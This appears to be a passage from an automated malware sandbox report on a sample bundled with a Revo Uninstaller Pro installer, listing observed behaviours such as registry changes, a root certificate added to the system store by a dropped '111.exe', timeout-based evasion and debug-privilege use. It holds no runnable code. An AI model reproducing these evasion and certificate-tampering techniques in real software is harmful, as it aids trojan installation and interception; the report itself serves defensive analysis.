Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\bitsadmin.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\runonce.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\runonce.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ruel\ = "RevoUninstallerPro.ruel" C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}\ = "RUShellExt Class" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}\InprocServer32\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\RUExt.dll" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\ProgID C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272} C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\RevoUninstallerPro.ruel\DefaultIcon C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4} C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\TypeLib\ = "{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}" C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\RevoUninstallerPro.ruel\shell C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\shell\open\command\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\RevoUninPro.exe /implog \"%1\"" C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1\0\win32\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\ruplp.exe" C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\TypeLib C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\LicProtector.LicProtectorEXE510 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\DefaultIcon C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\RUShellExt\ = "{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\TypeLib\ = "{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}" C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\TypeLib C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272} C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\DefaultIcon\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\RevoUninPro.exe,0" C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\RevoUninstallerPro.ruel\shell\open C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\RUShellExt C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\ShellEx\ContextMenuHandlers\RUShellExt\ = "{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1\ = "LicProtector Library" C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\.ruel C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\shell\open C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\shell\open\command C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\ShellEx\ContextMenuHandlers\RUShellExt C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F} C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\ = "LicProtector Object" C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\ = "Revo Uninstaller Pro" C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\Shell\Open C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\.ruel C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{1D928D64-60D3-4FAC-B810-C4D9D8A680CF}\ = "RUExt" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Msi.Package\shellex\ContextMenuHandlers\RUShellExt C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\ = "ILicProtectorEXE510" C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\ProxyStubClsid32 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\Version C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\Shell C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\RevoUninstallerPro.ruel\shell\open\command C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\RUShellExt\ = "{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1\0\win32 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\TypeLib\ = "{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}" C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\ProgID\ = "LicProtector.LicProtectorEXE510" C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\LicProtector.LicProtectorEXE510\Clsid\ = "{DD72B942-27D2-4A3C-9353-FA0441FBABA0}" C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\InfoTip = "Uninstall, Remove Programs, Clear Web Browsers Tracks, Control Automatically Started Applications" C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\DefaultIcon C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\DefaultIcon\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\RevoUninPro.exe,0" C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\RevoUninstallerPro.ruel\DefaultIcon C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\ = "ILicProtectorEXE510" C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\Version\ = "5.1" C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\Shell\Open\command C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\ShellFolder C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\RevoUninstallerPro.ruel C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\RUExt.DLL C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1\HELPDIR\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\" C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\Shell\Open\command\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\RevoUninPro.exe" C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Msi.Package\shellex\ContextMenuHandlers\RUShellExt\ = "{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}" C:\Windows\system32\regsvr32.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\ProgramData\uzlyLtM20yixSdV\111.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\ProgramData\uzlyLtM20yixSdV\111.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
N/A N/A C:\ProgramData\uzlyLtM20yixSdV\111.exe N/A
N/A N/A C:\ProgramData\uzlyLtM20yixSdV\111.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\rundll32.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\rundll32.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\rundll32.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\rundll32.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\rundll32.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\rundll32.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\rundll32.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\uzlyLtM20yixSdV\7z.exe N/A
Token: 35 N/A C:\ProgramData\uzlyLtM20yixSdV\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\ProgramData\uzlyLtM20yixSdV\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\ProgramData\uzlyLtM20yixSdV\7z.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\uzlyLtM20yixSdV\7z.exe N/A
Token: 35 N/A C:\ProgramData\uzlyLtM20yixSdV\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\ProgramData\uzlyLtM20yixSdV\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\ProgramData\uzlyLtM20yixSdV\7z.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\uzlyLtM20yixSdV\7z.exe N/A
Token: 35 N/A C:\ProgramData\uzlyLtM20yixSdV\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\ProgramData\uzlyLtM20yixSdV\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\ProgramData\uzlyLtM20yixSdV\7z.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\uzlyLtM20yixSdV\111.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
N/A N/A C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
